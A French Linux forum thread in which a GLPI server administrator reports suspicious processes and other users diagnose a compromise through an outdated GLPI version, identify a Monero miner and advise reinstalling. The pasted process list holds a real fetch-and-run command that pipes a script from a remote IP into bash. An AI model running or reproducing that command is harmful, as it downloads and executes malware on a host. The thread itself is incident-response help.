Pages : 1
#1 Le 24/08/2023, à 16:13
- Jazza
Comment trouver d'ou se lancent ces process
Bonjour,
J'ai un problème avec un serveur ubuntu sur lequel est installé GLPI.
J'ai remarqué que j'avais des requêtes externe très louche dans mes process:
www-data 51904 0.0 0.0 2888 1000 ? S 15:13 0:00 sh -c (curl -s http://103.214.112.10/linux.sh||wget -q -O- http://103.214.112.10/linux.sh)|bash
www-data 51905 0.0 0.2 11148 4364 ? S 15:13 0:00 wget -q -O- http://103.214.112.10/linux.sh
le user www-data est mon user apache, je n'ai aucun cron sous son user et j'ai vérifié les autres et aucune trace de ces requêtes.
Est-ce qu'il y a moyen de savoir d'où cela s'exécute?
Ubuntu 22.04.3 LTS
GLPI 9.5.9
J'ai désactivé tous les plugins GLPI au cas ou mais je n'ai rien trouvé. Les mots de passe ont été changés et l'IP indiqué (qui est en indonésie) est bloquée également.
Je ne suis pas un cador en linux donc soyez indulgent
Merci pour votre aide.
PS: si c'est pas le bon forum, désolé
Dernière modification par Jazza (Le 24/08/2023, à 16:14)
Hors ligne
#2 Le 24/08/2023, à 16:39
- bruno
Re : Comment trouver d'ou se lancent ces process
Bonjour,
Ton serveur a été compromis via une application web. Il faut le réinstaller entièrement ( après avoir éventuellement fait une image disque pour une analyse post-mortem)
Je n'ai pas le temps de regarder en détail mais les processus en question tentent de télécharger et d’exécuter un script bash qui lui même tente de lancer un exécutable (probablement un mineur de crypto-monnaies) récupéré sur une autre machine compromise
Dernière modification par bruno (Le 24/08/2023, à 16:42)
#3 Le 24/08/2023, à 21:58
- Nuliel
Re : Comment trouver d'ou se lancent ces process
Bonjour,
Je confirme que ta machine est compromise et qu'il faut réinstaller.
J'ai un peu analysé le malware, à première vue il s'agit effectivement d'un mineur de cryptomonnaie (XMR)
Et la confirmation de virustotal sur le binaire associé au JSON contenant l'adresse du portefeuille de l'attaquant: https://www.virustotal.com/gui/file/392 … 10531b4aab
Ta version de GLPI n'était pas à jour et il y a des vulnérabilités critiques sur cette version, qui sont visiblement activement exploitées.
Dernière modification par Nuliel (Le 24/08/2023, à 22:06)
Hors ligne
#4 Le 25/08/2023, à 04:35
- MicP
Re : Comment trouver d'ou se lancent ces process
Bonjour
D'autre part, sur la page d'accueil de GLPI
on peut voir sur la première ligne affichée le lien suivant : ⚠️ GLPI 9.5.x sera interrompu
Du côté du CERT, on peut lire dans la page 25 de leur rapport : PANORAMA DE LA CYBERMENACE 2022
…
A → L’EXPLOITATION DE VULNÉRABILITÉS
De nombreux incidents observés par et rapportés à l’ANSSI au cours de l’année 2022 ont pour origine l’exploitation de vulnérabilités disposant pourtant de correctifs mis à disposition par les éditeurs et ayant fait l’objet d’avis ou de bulletins d’alerte, toujours disponibles sur le site du CERT-FR.Pour les plus critiques, ces publications ont été accompagnées de campagnes de signalement.
Ces vulnérabilités concernent des logiciels particulièrement courants et utilisés par de très nombreuses organisations publiques comme privées.
Certaines de ces vulnérabilités, parmi les plus exploitées, sont corrigées depuis 2021.
…
Voir aussi le bulletin d'alerte (CERTFR-2022-ALE-010) concernant GLPI
Dernière modification par MicP (Le 25/08/2023, à 04:49)
Hors ligne
#5 Le 28/08/2023, à 11:39
- Jazza
Re : Comment trouver d'ou se lancent ces process
Bonjour,
Merci pour vos retours.
C'est bien ce que j'avais peur...
En fait, on avait remarqué cela sur notre ancien serveur (c'est pourquoi l'IP est bloqué) et on voulait upgrade sur la version 10.
On a réinstallé un serveur sur la version 9.5 pour l'upgrade en 10 mais j'ai remarqué qu'on avait de nouveau des tentatives de connexion depuis le nouveau.
Est-ce qu'il est possible d'installer la version 10 directement et de récupérer l'historique de la 9.5?
Encore merci!
Hors ligne
#6 Le 28/08/2023, à 17:25
- Watael
Re : Comment trouver d'ou se lancent ces process
je ne comprends pas.
ces scripts sont bien déclenchés par un élément du serveur, non ?
alors, n'y a-t-il pas moyen de savoir lequel pour soit le supprimer, soit réécrire la partie qui les lance ?
Dernière modification par Watael (Le 28/08/2023, à 17:25)
Connected \o/
Welcome to sHell. · eval is evil.
Hors ligne
#7 Le 28/08/2023, à 19:13
- Nuliel
Re : Comment trouver d'ou se lancent ces process
@Watael: selon https://www.virustotal.com/gui/file/392 … b/behavior ce serait via systemctl que la persistance se fait. Par ailleurs on sait pas si le binaire permet au serveur de commande et contrôle (C&C) peut prendre le contrôle du serveur à distance, on sait qu'il y a l'établissement d'un canal sécurisé, pas plus. Même si la bonne commande systemctl permet de retirer la persistance, on n'est pas sûr qu'il y a un autre moyen (crontab, ...), ni qu'il y ait d'autres binaires déposés, et l'impact qu'ils ont (linpeas par exemple pour de l’élévation de privilèges). Bref dans le doute, faut réinstaller.
Il y a pas une option à l'installation pour importer une base de données? (à noter que je connais pas glpi)
Hors ligne
#8 Le 28/08/2023, à 20:44
- Watael
Re : Comment trouver d'ou se lancent ces process
c'est clair. merci.
Connected \o/
Welcome to sHell. · eval is evil.
Hors ligne
Pages : 1